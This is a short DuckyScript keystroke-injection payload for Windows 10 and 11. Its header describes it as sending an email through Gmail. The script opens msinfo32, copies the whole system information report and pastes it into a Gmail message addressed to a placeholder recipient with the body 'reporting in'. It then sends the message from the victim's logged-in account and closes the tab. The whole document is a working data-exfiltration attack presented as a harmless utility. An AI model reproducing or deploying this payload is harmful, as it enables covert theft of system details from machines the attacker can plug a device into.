REM     Title: send email via gmail

REM     Author: findirfin

REM     Description: opens gmail and sends email

REM     Target: Windows 10, 11

REM     -----------------------------------------------------------------------------
REM     TARGET MUST TO BE LOGGED INTO GMAIL. REPLACE THE TO EMAIL
REM     -----------------------------------------------------------------------------

DELAY 2000
GUI r
DELAY 500
STRING msinfo32
ENTER 
DELAY 1000
CTRL A
DELAY 2000
CTRL C
DELAY 200
ALT F4
DELAY 200
GUI r
DELAY 500
REM                               
STRING https://mail.google.com/mail/?view=cm&fs=1&to=TO_EMAIL_HERE&su=message%20from%20usb&body=reporting%20in
ENTER
DELAY 20000
CTRL V
DELAY 500
CTRL ENTER
DELAY 3000
CTRL W
DELAY 200
